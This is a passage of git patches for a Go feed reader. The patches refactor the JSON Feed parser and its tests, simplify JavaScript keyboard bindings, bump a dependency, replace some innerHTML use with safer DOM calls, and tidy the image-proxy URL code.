- Authors []jsonAuthor `json:"authors"`
- Author jsonAuthor `json:"author"`
- Attachments []jsonAttachment `json:"attachments"`
- Tags []string `json:"tags"`
+type JSONHub struct {
+ // Type defines the protocol used to talk with the hub: "rssCloud" or "WebSub".
+ Type string `json:"type"`
+
+ // URL is the location of the hub.
+ URL string `json:"url"`
}
-type jsonAttachment struct {
- URL string `json:"url"`
+type JSONItem struct {
+ // Unique identifier for the item.
+ // Ideally, the id is the full URL of the resource described by the item, since URLs make great unique identifiers.
+ ID string `json:"id"`
+
+ // URL of the resource described by the item.
+ URL string `json:"url"`
+
+ // ExternalURL is the URL of a page elsewhere.
+ // This is especially useful for linkblogs.
+ // If url links to where you’re talking about a thing, then external_url links to the thing you’re talking about.
+ ExternalURL string `json:"external_url"`
+
+ // Title of the item (optional).
+ // Microblog items in particular may omit titles.
+ Title string `json:"title"`
+
+ // ContentHTML is the HTML body of the item.
+ ContentHTML string `json:"content_html"`
+
+ // ContentText is the text body of the item.
+ ContentText string `json:"content_text"`
+
+ // Summary is a plain text sentence or two describing the item.
+ Summary string `json:"summary"`
+
+ // ImageURL is the URL of the main image for the item.
+ ImageURL string `json:"image"`
+
+ // BannerImageURL is the URL of an image to use as a banner.
+ BannerImageURL string `json:"banner_image"`
+
+ // DatePublished is the date the item was published.
+ DatePublished string `json:"date_published"`
+
+ // DateModified is the date the item was modified.
+ DateModified string `json:"date_modified"`
+
+ // Language is the language of the item.
+ Language string `json:"language"`
+
+ // Authors is an array of JSONAuthor.
+ Authors []JSONAuthor `json:"authors"`
+
+ // Author is a JSONAuthor.
+ // JSON Feed v1 (deprecated)
+ Author JSONAuthor `json:"author"`
+
+ // Tags is an array of strings.
+ Tags []string `json:"tags"`
+
+ // Attachments is an array of JSONAttachment.
+ Attachments []JSONAttachment `json:"attachments"`
+}
+
+type JSONAttachment struct {
+ // URL of the attachment.
+ URL string `json:"url"`
+
+ // MIME type of the attachment.
MimeType string `json:"mime_type"`
- Title string `json:"title"`
- Size int64 `json:"size_in_bytes"`
- Duration int `json:"duration_in_seconds"`
-}
-
-func (j *jsonFeed) GetAuthor() string {
- if len(j.Authors) > 0 {
- return (getAuthor(j.Authors[0]))
- }
- return getAuthor(j.Author)
-}
-
-func (j *jsonFeed) Transform(baseURL string) *model.Feed {
- var err error
-
- feed := new(model.Feed)
-
- feed.FeedURL, err = urllib.AbsoluteURL(baseURL, j.FeedURL)
- if err != nil {
- feed.FeedURL = j.FeedURL
- }
-
- feed.SiteURL, err = urllib.AbsoluteURL(baseURL, j.SiteURL)
- if err != nil {
- feed.SiteURL = j.SiteURL
- }
-
- feed.IconURL = strings.TrimSpace(j.IconURL)
-
- if feed.IconURL == "" {
- feed.IconURL = strings.TrimSpace(j.FaviconURL)
- }
-
- feed.Title = strings.TrimSpace(j.Title)
- if feed.Title == "" {
- feed.Title = feed.SiteURL
- }
-
- for _, item := range j.Items {
- entry := item.Transform()
- entryURL, err := urllib.AbsoluteURL(feed.SiteURL, entry.URL)
- if err == nil {
- entry.URL = entryURL
- }
-
- if entry.Author == "" {
- entry.Author = j.GetAuthor()
- }
-
- feed.Entries = append(feed.Entries, entry)
- }
-
- return feed
-}
-
-func (j *jsonItem) GetDate() time.Time {
- for _, value := range []string{j.DatePublished, j.DateModified} {
- if value != "" {
- d, err := date.Parse(value)
- if err != nil {
- slog.Debug("Unable to parse date from JSON feed",
- slog.String("date", value),
- slog.String("url", j.URL),
- slog.Any("error", err),
- )
- return time.Now()
- }
-
- return d
- }
- }
-
- return time.Now()
-}
-
-func (j *jsonItem) GetAuthor() string {
- if len(j.Authors) > 0 {
- return getAuthor(j.Authors[0])
- }
- return getAuthor(j.Author)
-}
-
-func (j *jsonItem) GetHash() string {
- for _, value := range []string{j.ID, j.URL, j.Text + j.HTML + j.Summary} {
- if value != "" {
- return crypto.Hash(value)
- }
- }
-
- return ""
-}
-
-func (j *jsonItem) GetTitle() string {
- if j.Title != "" {
- return j.Title
- }
-
- for _, value := range []string{j.Summary, j.Text, j.HTML} {
- if value != "" {
- return sanitizer.TruncateHTML(value, 100)
- }
- }
-
- return j.URL
-}
-
-func (j *jsonItem) GetContent() string {
- for _, value := range []string{j.HTML, j.Text, j.Summary} {
- if value != "" {
- return value
- }
- }
-
- return ""
-}
-
-func (j *jsonItem) GetEnclosures() model.EnclosureList {
- enclosures := make(model.EnclosureList, 0)
-
- for _, attachment := range j.Attachments {
- if attachment.URL == "" {
- continue
- }
-
- enclosures = append(enclosures, &model.Enclosure{
- URL: attachment.URL,
- MimeType: attachment.MimeType,
- Size: attachment.Size,
- })
- }
-
- return enclosures
-}
-
-func (j *jsonItem) Transform() *model.Entry {
- entry := model.NewEntry()
- entry.URL = j.URL
- entry.Date = j.GetDate()
- entry.Author = j.GetAuthor()
- entry.Hash = j.GetHash()
- entry.Content = j.GetContent()
- entry.Title = strings.TrimSpace(j.GetTitle())
- entry.Enclosures = j.GetEnclosures()
- if len(j.Tags) > 0 {
- entry.Tags = j.Tags
- }
-
- return entry
-}
-
-func getAuthor(author jsonAuthor) string {
- if author.Name != "" {
- return strings.TrimSpace(author.Name)
- }
-
- return ""
+
+ // Title of the attachment.
+ Title string `json:"title"`
+
+ // Size of the attachment in bytes.
+ Size int64 `json:"size_in_bytes"`
+
+ // Duration of the attachment in seconds.
+ Duration int `json:"duration_in_seconds"`
}
diff --git a/internal/reader/json/parser.go b/internal/reader/json/parser.go
index ee0f634d..69a0f523 100644
--- a/internal/reader/json/parser.go
+++ b/internal/reader/json/parser.go
@@ -13,10 +13,10 @@ import (
// Parse returns a normalized feed struct from a JSON feed.
func Parse(baseURL string, data io.Reader) (*model.Feed, error) {
- feed := new(jsonFeed)
- if err := json.NewDecoder(data).Decode(&feed); err != nil {
+ jsonFeed := new(JSONFeed)
+ if err := json.NewDecoder(data).Decode(&jsonFeed); err != nil {
return nil, fmt.Errorf("json: unable to parse feed: %w", err)
}
- return feed.Transform(baseURL), nil
+ return NewJSONAdapter(jsonFeed).BuildFeed(baseURL), nil
}
diff --git a/internal/reader/json/parser_test.go b/internal/reader/json/parser_test.go
index 02664f5c..8e4102e0 100644
--- a/internal/reader/json/parser_test.go
+++ b/internal/reader/json/parser_test.go
@@ -10,7 +10,7 @@ import (
"time"
)
-func TestParseJsonFeed(t *testing.T) {
+func TestParseJsonFeedVersion1(t *testing.T) {
data := `{
"version": "https://jsonfeed.org/version/1",
"title": "My Example Feed",
@@ -49,7 +49,7 @@ func TestParseJsonFeed(t *testing.T) {
t.Errorf("Incorrect site URL, got: %s", feed.SiteURL)
}
- if feed.IconURL != "https://micro.blog/jsonfeed/avatar.jpg" {
+ if feed.IconURL != "https://micro.blog/jsonfeed/favicon.png" {
t.Errorf("Incorrect icon URL, got: %s", feed.IconURL)
}
@@ -177,7 +177,81 @@ func TestParsePodcast(t *testing.T) {
}
}
-func TestParseEntryWithoutAttachmentURL(t *testing.T) {
+func TestParseFeedWithoutTitle(t *testing.T) {
+ data := `{
+ "version": "https://jsonfeed.org/version/1",
+ "home_page_url": "https://example.org/",
+ "feed_url": "https://example.org/feed.json",
+ "items": [
+ {
+ "id": "2347259",
+ "url": "https://example.org/2347259",
+ "content_text": "Cats are neat. \n\nhttps://example.org/cats",
+ "date_published": "2016-02-09T14:22:00-07:00"
+ }
+ ]
+ }`
+
+ feed, err := Parse("https://example.org/feed.json", bytes.NewBufferString(data))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if feed.Title != "https://example.org/" {
+ t.Errorf("Incorrect title, got: %s", feed.Title)
+ }
+}
+
+func TestParseFeedWithoutHomePage(t *testing.T) {
+ data := `{
+ "version": "https://jsonfeed.org/version/1",
+ "feed_url": "https://example.org/feed.json",
+ "title": "Some test",
+ "items": [
+ {
+ "id": "2347259",
+ "url": "https://example.org/2347259",
+ "content_text": "Cats are neat. \n\nhttps://example.org/cats",
+ "date_published": "2016-02-09T14:22:00-07:00"
+ }
+ ]
+ }`
+
+ feed, err := Parse("https://example.org/feed.json", bytes.NewBufferString(data))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if feed.SiteURL != "https://example.org/feed.json" {
+ t.Errorf("Incorrect title, got: %s", feed.Title)
+ }
+}
+
+func TestParseFeedWithoutFeedURL(t *testing.T) {
+ data := `{
+ "version": "https://jsonfeed.org/version/1",
+ "title": "Some test",
+ "items": [
+ {
+ "id": "2347259",
+ "url": "https://example.org/2347259",
+ "content_text": "Cats are neat. \n\nhttps://example.org/cats",
+ "date_published": "2016-02-09T14:22:00-07:00"
+ }
+ ]
+ }`
+
+ feed, err := Parse("https://example.org/feed.json", bytes.NewBufferString(data))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if feed.SiteURL != "https://example.org/feed.json" {
+ t.Errorf("Incorrect title, got: %s", feed.Title)
+ }
+}
+
+func TestParseItemWithoutAttachmentURL(t *testing.T) {
data := `{
"version": "https://jsonfeed.org/version/1",
"user_comment": "This is a podcast feed. You can add this feed to your podcast client using the following URL: http://therecord.co/feed.json",
@@ -216,7 +290,7 @@ func TestParseEntryWithoutAttachmentURL(t *testing.T) {
}
}
-func TestParseFeedWithRelativeURL(t *testing.T) {
+func TestParseItemWithRelativeURL(t *testing.T) {
data := `{
"version": "https://jsonfeed.org/version/1",
"title": "Example",
@@ -241,7 +315,7 @@ func TestParseFeedWithRelativeURL(t *testing.T) {
}
}
-func TestParseAuthor(t *testing.T) {
+func TestParseItemWithLegacyAuthorField(t *testing.T) {
data := `{
"version": "https://jsonfeed.org/version/1",
"user_comment": "This is a microblog feed. You can add this to your feed reader using the following URL: https://example.org/feed.json",
@@ -277,7 +351,7 @@ func TestParseAuthor(t *testing.T) {
}
}
-func TestParseAuthors(t *testing.T) {
+func TestParseItemWithMultipleAuthorFields(t *testing.T) {
data := `{
"version": "https://jsonfeed.org/version/1.1",
"user_comment": "This is a microblog feed. You can add this to your feed reader using the following URL: https://example.org/feed.json",
@@ -285,11 +359,11 @@ func TestParseAuthors(t *testing.T) {
"home_page_url": "https://example.org/",
"feed_url": "https://example.org/feed.json",
"author": {
- "name": "This field is deprecated, use authors",
+ "name": "Deprecated Author Field",
"url": "http://example.org/",
"avatar": "https://example.org/avatar.png"
},
- "authors": [
+ "authors": [
{
"name": "Brent Simmons",
"url": "http://example.org/",
@@ -315,14 +389,15 @@ func TestParseAuthors(t *testing.T) {
t.Errorf("Incorrect number of entries, got: %d", len(feed.Entries))
}
- if feed.Entries[0].Author != "Brent Simmons" {
+ if feed.Entries[0].Author != "Brent Simmons, Deprecated Author Field" {
t.Errorf("Incorrect entry author, got: %s", feed.Entries[0].Author)
}
}
-func TestParseFeedWithoutTitle(t *testing.T) {
+func TestParseItemWithMultipleDuplicateAuthors(t *testing.T) {
data := `{
- "version": "https://jsonfeed.org/version/1",
+ "version": "https://jsonfeed.org/version/1.1",
+ "title": "Example",
"home_page_url": "https://example.org/",
"feed_url": "https://example.org/feed.json",
"items": [
@@ -330,7 +405,24 @@ func TestParseFeedWithoutTitle(t *testing.T) {
"id": "2347259",
"url": "https://example.org/2347259",
"content_text": "Cats are neat. \n\nhttps://example.org/cats",
- "date_published": "2016-02-09T14:22:00-07:00"
+ "date_published": "2016-02-09T14:22:00-07:00",
+ "authors": [
+ {
+ "name": "Author B",
+ "url": "http://example.org/",
+ "avatar": "https://example.org/avatar.png"
+ },
+ {
+ "name": "Author A",
+ "url": "http://example.org/",
+ "avatar": "https://example.org/avatar.png"
+ },
+ {
+ "name": "Author B",
+ "url": "http://example.org/",
+ "avatar": "https://example.org/avatar.png"
+ }
+ ]
}
]
}`
@@ -340,12 +432,16 @@ func TestParseFeedWithoutTitle(t *testing.T) {
t.Fatal(err)
}
- if feed.Title != "https://example.org/" {
- t.Errorf("Incorrect title, got: %s", feed.Title)
+ if len(feed.Entries) != 1 {
+ t.Errorf("Incorrect number of entries, got: %d", len(feed.Entries))
+ }
+
+ if feed.Entries[0].Author != "Author A, Author B" {
+ t.Errorf("Incorrect entry author, got: %s", feed.Entries[0].Author)
}
}
-func TestParseFeedItemWithInvalidDate(t *testing.T) {
+func TestParseItemWithInvalidDate(t *testing.T) {
data := `{
"version": "https://jsonfeed.org/version/1",
"title": "My Example Feed",
@@ -376,34 +472,7 @@ func TestParseFeedItemWithInvalidDate(t *testing.T) {
}
}
-func TestParseFeedItemWithoutID(t *testing.T) {
- data := `{
- "version": "https://jsonfeed.org/version/1",
- "title": "My Example Feed",
- "home_page_url": "https://example.org/",
- "feed_url": "https://example.org/feed.json",
- "items": [
- {
- "content_text": "Some text."
- }
- ]
- }`
-
- feed, err := Parse("https://example.org/feed.json", bytes.NewBufferString(data))
- if err != nil {
- t.Fatal(err)
- }
-
- if len(feed.Entries) != 1 {
- t.Errorf("Incorrect number of entries, got: %d", len(feed.Entries))
- }
-
- if feed.Entries[0].Hash != "13b4c5aecd1b6d749afcee968fbf9c80f1ed1bbdbe1aaf25cb34ebd01144bbe9" {
- t.Errorf("Incorrect entry hash, got: %s", feed.Entries[0].Hash)
- }
-}
-
-func TestParseFeedItemWithoutTitleButWithURL(t *testing.T) {
+func TestParseItemWithoutTitleButWithURL(t *testing.T) {
data := `{
"version": "https://jsonfeed.org/version/1",
"title": "My Example Feed",
@@ -430,7 +499,7 @@ func TestParseFeedItemWithoutTitleButWithURL(t *testing.T) {
}
}
-func TestParseFeedItemWithoutTitleButWithSummary(t *testing.T) {
+func TestParseItemWithoutTitleButWithSummary(t *testing.T) {
data := `{
"version": "https://jsonfeed.org/version/1",
"title": "My Example Feed",
@@ -457,7 +526,7 @@ func TestParseFeedItemWithoutTitleButWithSummary(t *testing.T) {
}
}
-func TestParseFeedItemWithoutTitleButWithHTMLContent(t *testing.T) {
+func TestParseItemWithoutTitleButWithHTMLContent(t *testing.T) {
data := `{
"version": "https://jsonfeed.org/version/1",
"title": "My Example Feed",
@@ -484,7 +553,7 @@ func TestParseFeedItemWithoutTitleButWithHTMLContent(t *testing.T) {
}
}
-func TestParseFeedItemWithoutTitleButWithTextContent(t *testing.T) {
+func TestParseItemWithoutTitleButWithTextContent(t *testing.T) {
data := `{
"version": "https://jsonfeed.org/version/1",
"title": "My Example Feed",
@@ -515,7 +584,7 @@ func TestParseFeedItemWithoutTitleButWithTextContent(t *testing.T) {
}
}
-func TestParseTruncateItemTitleUnicode(t *testing.T) {
+func TestParseItemWithTooLongUnicodeTitle(t *testing.T) {
data := `{
"version": "https://jsonfeed.org/version/1",
"title": "My Example Feed",
@@ -573,15 +642,34 @@ func TestParseItemTitleWithXMLTags(t *testing.T) {
}
}
-func TestParseInvalidJSON(t *testing.T) {
- data := `garbage`
- _, err := Parse("https://example.org/feed.json", bytes.NewBufferString(data))
- if err == nil {
- t.Error("Parse should returns an error")
+func TestParseItemWithoutID(t *testing.T) {
+ data := `{
+ "version": "https://jsonfeed.org/version/1",
+ "title": "My Example Feed",
+ "home_page_url": "https://example.org/",
+ "feed_url": "https://example.org/feed.json",
+ "items": [
+ {
+ "content_text": "Some text."
+ }
+ ]
+ }`
+
+ feed, err := Parse("https://example.org/feed.json", bytes.NewBufferString(data))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if len(feed.Entries) != 1 {
+ t.Errorf("Incorrect number of entries, got: %d", len(feed.Entries))
+ }
+
+ if feed.Entries[0].Hash != "13b4c5aecd1b6d749afcee968fbf9c80f1ed1bbdbe1aaf25cb34ebd01144bbe9" {
+ t.Errorf("Incorrect entry hash, got: %s", feed.Entries[0].Hash)
}
}
-func TestParseTags(t *testing.T) {
+func TestParseItemTags(t *testing.T) {
data := `{
"version": "https://jsonfeed.org/version/1",
"user_comment": "This is a microblog feed. You can add this to your feed reader using the following URL: https://example.org/feed.json",
@@ -600,7 +688,8 @@ func TestParseTags(t *testing.T) {
"content_text": "Cats are neat. \n\nhttps://example.org/cats",
"date_published": "2016-02-09T14:22:00-07:00",
"tags": [
- "tag 1",
+ " tag 1",
+ " ",
"tag 2"
]
}
@@ -623,11 +712,11 @@ func TestParseTags(t *testing.T) {
}
}
-func TestParseFavicon(t *testing.T) {
+func TestParseFeedFavicon(t *testing.T) {
data := `{
"version": "https://jsonfeed.org/version/1",
"title": "My Example Feed",
- "favicon": "https://micro.blog/jsonfeed/favicon.png",
+ "favicon": "https://example.org/jsonfeed/favicon.png",
"home_page_url": "https://example.org/",
"feed_url": "https://example.org/feed.json",
"items": [
@@ -648,7 +737,45 @@ func TestParseFavicon(t *testing.T) {
if err != nil {
t.Fatal(err)
}
- if feed.IconURL != "https://micro.blog/jsonfeed/favicon.png" {
+ if feed.IconURL != "https://example.org/jsonfeed/favicon.png" {
t.Errorf("Incorrect icon URL, got: %s", feed.IconURL)
}
}
+
+func TestParseFeedIcon(t *testing.T) {
+ data := `{
+ "version": "https://jsonfeed.org/version/1",
+ "title": "My Example Feed",
+ "icon": "https://example.org/jsonfeed/icon.png",
+ "home_page_url": "https://example.org/",
+ "feed_url": "https://example.org/feed.json",
+ "items": [
+ {
+ "id": "2",
+ "content_text": "This is a second item.",
+ "url": "https://example.org/second-item"
+ },
+ {
+ "id": "1",
+ "content_html": "
Hello, world!
",
+ "url": "https://example.org/initial-post"
+ }
+ ]
+ }`
+
+ feed, err := Parse("https://example.org/feed.json", bytes.NewBufferString(data))
+ if err != nil {
+ t.Fatal(err)
+ }
+ if feed.IconURL != "https://example.org/jsonfeed/icon.png" {
+ t.Errorf("Incorrect icon URL, got: %s", feed.IconURL)
+ }
+}
+
+func TestParseInvalidJSON(t *testing.T) {
+ data := `garbage`
+ _, err := Parse("https://example.org/feed.json", bytes.NewBufferString(data))
+ if err == nil {
+ t.Error("Parse should returns an error")
+ }
+}
From d25c032171e47799da40a155bd172308fbfb036f Mon Sep 17 00:00:00 2001
From: jvoisin
Date: Mon, 11 Mar 2024 01:01:41 +0100
Subject: [PATCH 06/80] Simplify bootstrap.js
- Don't wrap a function in a lambda that only calls it; pass the function directly instead.
- Remove a hack for "Chrome 67 and earlier" since it was released in 2018.
---
internal/ui/static/js/bootstrap.js | 56 ++++++++++++++----------------
1 file changed, 26 insertions(+), 30 deletions(-)
diff --git a/internal/ui/static/js/bootstrap.js b/internal/ui/static/js/bootstrap.js
index 53793a4c..e89a74dc 100644
--- a/internal/ui/static/js/bootstrap.js
+++ b/internal/ui/static/js/bootstrap.js
@@ -6,38 +6,38 @@ document.addEventListener("DOMContentLoaded", () => {
keyboardHandler.on("g u", () => goToPage("unread"));
keyboardHandler.on("g b", () => goToPage("starred"));
keyboardHandler.on("g h", () => goToPage("history"));
- keyboardHandler.on("g f", () => goToFeedOrFeeds());
+ keyboardHandler.on("g f", goToFeedOrFeeds);
keyboardHandler.on("g c", () => goToPage("categories"));
keyboardHandler.on("g s", () => goToPage("settings"));
- keyboardHandler.on("ArrowLeft", () => goToPrevious());
- keyboardHandler.on("ArrowRight", () => goToNext());
- keyboardHandler.on("k", () => goToPrevious());
- keyboardHandler.on("p", () => goToPrevious());
- keyboardHandler.on("j", () => goToNext());
- keyboardHandler.on("n", () => goToNext());
+ keyboardHandler.on("ArrowLeft", goToPrevious);
+ keyboardHandler.on("ArrowRight", goToNext);
+ keyboardHandler.on("k", goToPrevious);
+ keyboardHandler.on("p", goToPrevious);
+ keyboardHandler.on("j", goToNext);
+ keyboardHandler.on("n", goToNext);
keyboardHandler.on("h", () => goToPage("previous"));
keyboardHandler.on("l", () => goToPage("next"));
- keyboardHandler.on("z t", () => scrollToCurrentItem());
- keyboardHandler.on("o", () => openSelectedItem());
+ keyboardHandler.on("z t", scrollToCurrentItem);
+ keyboardHandler.on("o", openSelectedItem);
keyboardHandler.on("Enter", () => openSelectedItem());
- keyboardHandler.on("v", () => openOriginalLink());
+ keyboardHandler.on("v", openOriginalLink);
keyboardHandler.on("V", () => openOriginalLink(true));
- keyboardHandler.on("c", () => openCommentLink());
+ keyboardHandler.on("c", openCommentLink);
keyboardHandler.on("C", () => openCommentLink(true));
keyboardHandler.on("m", () => handleEntryStatus("next"));
keyboardHandler.on("M", () => handleEntryStatus("previous"));
- keyboardHandler.on("A", () => markPageAsRead());
- keyboardHandler.on("s", () => handleSaveEntry());
- keyboardHandler.on("d", () => handleFetchOriginalContent());
- keyboardHandler.on("f", () => handleBookmark());
- keyboardHandler.on("F", () => goToFeed());
- keyboardHandler.on("R", () => handleRefreshAllFeeds());
- keyboardHandler.on("?", () => showKeyboardShortcuts());
- keyboardHandler.on("+", () => goToAddSubscription());
- keyboardHandler.on("#", () => unsubscribeFromFeed());
+ keyboardHandler.on("A", markPageAsRead);
+ keyboardHandler.on("s", handleSaveEntry);
+ keyboardHandler.on("d", handleFetchOriginalContent);
+ keyboardHandler.on("f", handleBookmark);
+ keyboardHandler.on("F", goToFeed);
+ keyboardHandler.on("R", handleRefreshAllFeeds);
+ keyboardHandler.on("?", showKeyboardShortcuts);
+ keyboardHandler.on("+", goToAddSubscription);
+ keyboardHandler.on("#", unsubscribeFromFeed);
keyboardHandler.on("/", () => goToPage("search"));
keyboardHandler.on("a", () => {
- let enclosureElement = document.querySelector('.entry-enclosures');
+ const enclosureElement = document.querySelector('.entry-enclosures');
if (enclosureElement) {
enclosureElement.toggleAttribute('open');
}
@@ -82,11 +82,10 @@ document.addEventListener("DOMContentLoaded", () => {
onClick(":is(a, button)[data-save-entry]", (event) => handleSaveEntry(event.target));
onClick(":is(a, button)[data-toggle-bookmark]", (event) => handleBookmark(event.target));
- onClick(":is(a, button)[data-fetch-content-entry]", () => handleFetchOriginalContent());
- onClick(":is(a, button)[data-share-status]", () => handleShare());
- onClick(":is(a, button)[data-action=markPageAsRead]", (event) => handleConfirmationMessage(event.target, () => markPageAsRead()));
+ onClick(":is(a, button)[data-fetch-content-entry]", handleFetchOriginalContent);
+ onClick(":is(a, button)[data-share-status]", handleShare);
+ onClick(":is(a, button)[data-action=markPageAsRead]", (event) => handleConfirmationMessage(event.target, markPageAsRead));
onClick(":is(a, button)[data-toggle-status]", (event) => handleEntryStatus("next", event.target));
-
onClick(":is(a, button)[data-confirm]", (event) => handleConfirmationMessage(event.target, (url, redirectURL) => {
let request = new RequestBuilder(url);
@@ -118,8 +117,8 @@ document.addEventListener("DOMContentLoaded", () => {
fixVoiceOverDetailsSummaryBug();
const logoElement = document.querySelector(".logo");
- logoElement.addEventListener("click", (event) => toggleMainMenu(event));
- logoElement.addEventListener("keydown", (event) => toggleMainMenu(event));
+ logoElement.addEventListener("click", toggleMainMenu);
+ logoElement.addEventListener("keydown", toggleMainMenu);
onClick(".header nav li", (event) => onClickMainMenuListItem(event));
@@ -131,9 +130,6 @@ document.addEventListener("DOMContentLoaded", () => {
}
window.addEventListener('beforeinstallprompt', (e) => {
- // Prevent Chrome 67 and earlier from automatically showing the prompt.
- e.preventDefault();
-
let deferredPrompt = e;
const promptHomeScreen = document.getElementById('prompt-home-screen');
if (promptHomeScreen) {
From d862d86f907dea7a612b3fe9bdfde102f097d3f1 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Wed, 13 Mar 2024 23:38:14 +0000
Subject: [PATCH 07/80] Bump google.golang.org/protobuf from 1.32.0 to 1.33.0
Bumps google.golang.org/protobuf from 1.32.0 to 1.33.0.
---
updated-dependencies:
- dependency-name: google.golang.org/protobuf
dependency-type: indirect
...
Signed-off-by: dependabot[bot]
---
go.mod | 2 +-
go.sum | 4 ++--
2 files changed, 3 insertions(+), 3 deletions(-)
diff --git a/go.mod b/go.mod
index 796aedaa..626a87d1 100644
--- a/go.mod
+++ b/go.mod
@@ -42,7 +42,7 @@ require (
golang.org/x/sys v0.18.0 // indirect
golang.org/x/text v0.14.0 // indirect
google.golang.org/appengine v1.6.8 // indirect
- google.golang.org/protobuf v1.32.0 // indirect
+ google.golang.org/protobuf v1.33.0 // indirect
)
go 1.22
diff --git a/go.sum b/go.sum
index 53378572..7ee72412 100644
--- a/go.sum
+++ b/go.sum
@@ -124,8 +124,8 @@ google.golang.org/appengine v1.6.8 h1:IhEN5q69dyKagZPYMSdIjS2HqprW324FRQZJcGqPAs
google.golang.org/appengine v1.6.8/go.mod h1:1jJ3jBArFh5pcgW8gCtRJnepW8FzD1V44FJffLiz/Ds=
google.golang.org/protobuf v1.26.0-rc.1/go.mod h1:jlhhOSvTdKEhbULTjvd4ARK9grFBp09yW+WbY/TyQbw=
google.golang.org/protobuf v1.26.0/go.mod h1:9q0QmTI4eRPtz6boOQmLYwt+qCgq0jsYwAQnmE0givc=
-google.golang.org/protobuf v1.32.0 h1:pPC6BG5ex8PDFnkbrGU3EixyhKcQ2aDuBS36lqK/C7I=
-google.golang.org/protobuf v1.32.0/go.mod h1:c6P6GXX6sHbq/GpV6MGZEdwhWPcYBgnhAHhKbcUYpos=
+google.golang.org/protobuf v1.33.0 h1:uNO2rsAINq/JlFpSdYEKIZ0uKD/R9cpdv0T+yoGwGmI=
+google.golang.org/protobuf v1.33.0/go.mod h1:c6P6GXX6sHbq/GpV6MGZEdwhWPcYBgnhAHhKbcUYpos=
gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA=
From e0ee28c01316142de40b6db89d645395251a9dcc Mon Sep 17 00:00:00 2001
From: jvoisin
Date: Wed, 13 Mar 2024 18:20:45 +0100
Subject: [PATCH 08/80] More progress towards trusted-types
Create a new function `addIcon` and use it to add icons, instead of
operating on raw html.
---
internal/ui/static/js/app.js | 28 +++++++++++++++++++++-------
1 file changed, 21 insertions(+), 7 deletions(-)
diff --git a/internal/ui/static/js/app.js b/internal/ui/static/js/app.js
index 51a73e2e..2ce1a1e8 100644
--- a/internal/ui/static/js/app.js
+++ b/internal/ui/static/js/app.js
@@ -167,6 +167,14 @@ function handleEntryStatus(item, element, setToRead) {
}
}
+// Add a span-icon with a `label` to `element` as a child
+function addIcon(element, label) {
+ const span = document.createElement('span');
+ span.classList.add('icon-label');
+ span.textContent = label;
+ element.appendChild(span);
+}
+
// Change the entry status to the opposite value.
function toggleEntryStatus(element, toasting) {
const entryID = parseInt(element.dataset.id, 10);
@@ -193,7 +201,8 @@ function toggleEntryStatus(element, toasting) {
}
}
- link.innerHTML = iconElement.innerHTML + '' + label + '';
+ link.innerHTML = iconElement.innerHTML;
+ addIcon(link, label);
link.dataset.value = newStatus;
if (element.classList.contains("item-status-" + currentStatus)) {
@@ -258,11 +267,13 @@ function saveEntry(element, toasting) {
return;
}
- element.innerHTML = '' + element.dataset.labelLoading + '';
+ element.textContent = "";
+ addIcon(element, element.dataset.labelLoading);
const request = new RequestBuilder(element.dataset.saveUrl);
request.withCallback(() => {
- element.innerHTML = '' + element.dataset.labelDone + '';
+ element.textContent = "";
+ addIcon(element, element.dataset.labelDone);
element.dataset.completed = true;
if (toasting) {
const iconElement = document.querySelector("template#icon-save");
@@ -288,7 +299,8 @@ function toggleBookmark(parentElement, toasting) {
return;
}
- element.innerHTML = '' + element.dataset.labelLoading + '';
+ element.textContent = "";
+ addIcon(element, element.dataset.labelLoading);
const request = new RequestBuilder(element.dataset.bookmarkUrl);
request.withCallback(() => {
@@ -310,7 +322,8 @@ function toggleBookmark(parentElement, toasting) {
}
}
- element.innerHTML = iconElement.innerHTML + '' + label + '';
+ element.innerHTML = iconElement.innerHTML;
+ addIcon(element, label);
element.dataset.value = newStarStatus;
});
request.execute();
@@ -328,7 +341,7 @@ function handleFetchOriginalContent() {
}
const previousElement = element.cloneNode(true);
- element.innerHTML = '' + element.dataset.labelLoading + '';
+ addIcon(element, element.dataset.labelLoading);
const request = new RequestBuilder(element.dataset.fetchContentUrl);
request.withCallback((response) => {
@@ -615,7 +628,8 @@ function showToast(label, iconElement) {
const toastMsgElement = document.getElementById("toast-msg");
if (toastMsgElement) {
- toastMsgElement.innerHTML = iconElement.innerHTML + '' + label + '';
+ toastMsgElement.innerHTML = iconElement.innerHTML;
+ addIcon(toastMsgElement, label);
const toastElementWrapper = document.getElementById("toast-wrapper");
if (toastElementWrapper) {
From 66b8483791e58030c0cc3b5c5d82b0b0d5e87cec Mon Sep 17 00:00:00 2001
From: jvoisin
Date: Wed, 13 Mar 2024 23:16:58 +0100
Subject: [PATCH 09/80] Minor simplification of internal/proxy/proxy.go
- re-use ProxifyURL to implement AbsoluteProxifyURL, reducing the copy-pasta
- reduce the internal indentation of ProxifyURL by inverting some conditions
---
internal/proxy/proxy.go | 49 ++++++++++++++---------------------------
1 file changed, 16 insertions(+), 33 deletions(-)
diff --git a/internal/proxy/proxy.go b/internal/proxy/proxy.go
index 8b177348..512431df 100644
--- a/internal/proxy/proxy.go
+++ b/internal/proxy/proxy.go
@@ -19,51 +19,34 @@ import (
// ProxifyURL generates a relative URL for a proxified resource.
func ProxifyURL(router *mux.Router, link string) string {
- if link != "" {
- proxyImageUrl := config.Opts.ProxyUrl()
-
- if proxyImageUrl == "" {
- mac := hmac.New(sha256.New, config.Opts.ProxyPrivateKey())
- mac.Write([]byte(link))
- digest := mac.Sum(nil)
- return route.Path(router, "proxy", "encodedDigest", base64.URLEncoding.EncodeToString(digest), "encodedURL", base64.URLEncoding.EncodeToString([]byte(link)))
- }
+ if link == "" {
+ return ""
+ }
+ if proxyImageUrl := config.Opts.ProxyUrl(); proxyImageUrl != "" {
proxyUrl, err := url.Parse(proxyImageUrl)
if err != nil {
return ""
}
-
